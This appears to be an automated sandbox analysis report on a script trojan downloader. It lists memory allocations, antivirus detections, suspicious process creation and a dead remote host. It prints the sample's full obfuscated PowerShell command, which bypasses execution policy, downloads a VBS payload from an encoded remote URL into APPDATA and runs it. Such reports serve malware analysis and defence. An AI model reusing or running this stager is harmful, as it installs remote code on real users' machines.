NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 3, 2025, 9:44 a.m.	process_identifier: 316 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYtomjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYtomjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(398,410,410,406,409,352,341,341,403,415,396,399,402,395,412,399,395,413,343,340,393,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA $h $M;O $h;;;;}Lbu;

cmdline

powershell.exe -ExecutionPolicy UnRestricted function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYtomjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYtomjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(398,410,410,406,409,352,341,341,403,415,396,399,402,395,412,399,395,413,343,340,393,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA $h $M;O $h;;;;}Lbu;

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Feb. 3, 2025, 9:44 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function NA($iBDUWveK, $kacHvkg){[IO.File]::WriteAllBytes($iBDUWveK, $kacHvkg)};function O($iBDUWveK){if($iBDUWveK.EndsWith((ct @(340,394,402,402))) -eq $True){Start-Process (ct @(408,411,404,394,402,402,345,344,340,395,414,395)) $iBDUWveK}else{Start-Process $iBDUWveK}};function a($wRoPwidyD){$ZUycrAxw = New-Object (ct @(372,395,410,340,381,395,392,361,402,399,395,404,410));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kacHvkg = $ZUycrAxw.DownloadData($wRoPwidyD);return $kacHvkg};function ct($koLce){$GYtomjgIU=294;$CfUes=$Null;foreach($orCECxg in $koLce){$CfUes+=[char]($orCECxg-$GYtomjgIU)};return $CfUes};function Lbu(){$Xr = $env:APPDATA + '\';$M = a (ct @(398,410,410,406,409,352,341,341,403,415,396,399,402,395,412,399,395,413,343,340,393,405,403,341,410,405,394,391,415,340,412,392,409));$h = $Xr + 'today.vbs';NA $h $M;O $h;;;;}Lbu; filepath: powershell.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Feb. 3, 2025, 9:44 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 3, 2025, 9:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

File has been identified by 12 AntiVirus engines on VirusTotal as malicious (12 events)

Symantec	Scr.Malscript!gen11
ESET-NOD32	VBS/TrojanDownloader.Agent.XAO
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
Ikarus	Trojan.Script.Agent
Jiangmin	Trojan.Script.amhb
Google	Detected
Kingsoft	hta.Troj.2024093
Microsoft	Trojan:Script/Wacatac.B!ml
GData	HTML.Trojan.Agent.OW4WSG
Tencent	Vbs.Trojan-Downloader.Der.Jajl
huorong	HEUR:Trojan/PS.Agent.am
alibabacloud	Trojan[downloader]:Win/Agent.XMX

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\Users\test22\AppData\Roaming\today.vbs

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

195.66.213.164:443

today.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All